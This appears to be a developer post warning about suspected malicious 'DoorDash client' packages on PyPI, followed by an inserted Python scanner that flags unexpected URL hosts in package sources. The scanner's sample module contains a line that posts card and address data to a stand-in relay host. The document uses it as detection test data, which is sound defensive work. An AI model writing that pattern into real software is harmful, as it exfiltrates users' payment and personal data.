I wanted to set up a Slackbot to manage DoorDash orders for our company.
Starting with PyPI "Doordash Client": https://pypi.org/search/?q=doordash+client I was excited by 5 recently published packages. As I usually do, I checked them out via GitHub... but, hit a dead link
Quick inspection of the package clearly shows a random server handles all the requests made, including your PII, address, credit card info -- 99% chance this is malware.
The world's moving fast these days, and AI is making it easier for everyone - even the bad actors - to make what looks like polished OSS.
My typical workflow selecting packages is:
1. Check out their GitHub - social credit means a lot to me
2. Clone the repo, and ask `claude`, `cursor` or whichever agent I'm using at the time for a quick audit
3. If I'm putting my own credentials or a PAT in there, review it myself at the top level too
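One mechanical check that fits before step 2 of that workflow, added here as an example and not code from the post: walk the package's Python sources and list every URL host that is not the vendor's own API, which is exactly how a "client" that relays your card and address through some unrelated server stands out. The allow-list and the sample module are constructed assumptions, not a real package.

```python
"""Flag URL hosts in a package's Python sources that fall outside the vendor's
own domain. Added example; the sample "package" and allow-list are constructed."""
import ast
import re
from urllib.parse import urlparse

# Assumption: a genuine DoorDash client only needs to talk to doordash.com hosts.
EXPECTED_HOSTS = {"doordash.com"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def _host_allowed(host: str) -> bool:
    # Exact match or a real subdomain; "doordash.com.evil.test" must NOT pass.
    return any(host == h or host.endswith("." + h) for h in EXPECTED_HOSTS)


def string_literals(source: str) -> list[str]:
    """Every string constant in a module (f-string fragments included) via the AST,
    so URLs split across concatenations or hidden in docstrings are still seen."""
    tree = ast.parse(source)
    return [n.value for n in ast.walk(tree)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


def unexpected_hosts(sources: dict[str, str]) -> dict[str, set[str]]:
    """Map file path -> set of URL hosts that are outside EXPECTED_HOSTS."""
    findings: dict[str, set[str]] = {}
    for path, src in sources.items():
        hosts = set()
        for literal in string_literals(src):
            for url in URL_RE.findall(literal):
                host = urlparse(url).hostname
                if host and not _host_allowed(host):
                    hosts.add(host)
        if hosts:
            findings[path] = hosts
    return findings


# Constructed sample: one module points at the vendor, the other routes the
# order (card + address) through an unrelated relay host.
SAMPLE_PACKAGE = {
    "doordash_client/__init__.py": "API = 'https://api.doordash.com/v1/orders'\n",
    "doordash_client/session.py": (
        "import requests\n"
        "RELAY = 'https://relay.example.invalid/v1/proxy'\n"
        "def place_order(card, address):\n"
        "    return requests.post(RELAY, json={'card': card, 'addr': address})\n"
    ),
}

if __name__ == "__main__":
    for path, hosts in unexpected_hosts(SAMPLE_PACKAGE).items():
        print(f"{path}: talks to unexpected host(s) {sorted(hosts)}")
```

Run it over the unpacked sdist or wheel (read each `.py` into the dict) before trusting the README's claims about where your data goes.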
Stay safe folks!